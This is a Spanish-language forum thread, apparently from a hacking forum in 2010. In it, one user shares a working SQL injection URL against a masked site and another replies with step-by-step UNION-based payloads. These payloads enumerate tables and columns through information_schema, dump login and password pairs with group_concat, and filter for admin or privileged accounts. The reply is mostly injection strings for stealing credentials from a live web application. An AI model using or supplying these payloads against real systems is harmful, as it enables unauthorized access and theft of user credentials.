Ayuda, no logro encontrar el nombre de administrador.

Iniciado por Kaosk., 18 Agosto 2010, 23:05 PM

0 Miembros y 1 Visitante están viendo este tema.

Kaosk.

Muy buenas tardes, estoy haciendo pruebas de SQLi y esta ha sido la primera que me ha salido bien, hasta el momento ;-).
Pues el problema es que no encuentro ninguna tabla llamada "users,usuarios" o algo y ahí me quedoo entrabancado dejo la inyección:

(http://www.xxxx.xxx/info_page.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+1,1--) A partir de ahí que tengo que hacer para poder encontrar el usuario/administrador, un saludo y muchas gracias.

cgvwzq

Sacas todas las tablas, y buscas la de los usuarios:

union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+

A esa tabla la llamaremos 'usuarios'. Ahora sacas los campos de la tabla usuarios:

union+select+1,group_concat(column_name),3,4,5+from+information_schema.column+where+table_name='usuarios'+--+

Entre otros campos, tiene el campo 'login' y 'pwd', por ejemplo:

union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+--+

Sacará los usuarios. Si en alguno de los pasos no salen todos, es porque no caben, puedes usar 'limit' y sacarlos uno a uno, o usar este truco.

Si solo quieres el del admin, puedes añadir una cláusula where o ver si hay algún campo en la tabla que represente los privilegios del usuario.

union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+login+like+'%admin%'--+

union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+priv=1+--+

No seas malo...
Some stuff:

  • www.a] parsed as www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ



Kaosk.

Muchas gracias :D
Tranquilo que no haré nada solo estoy practicando hehe.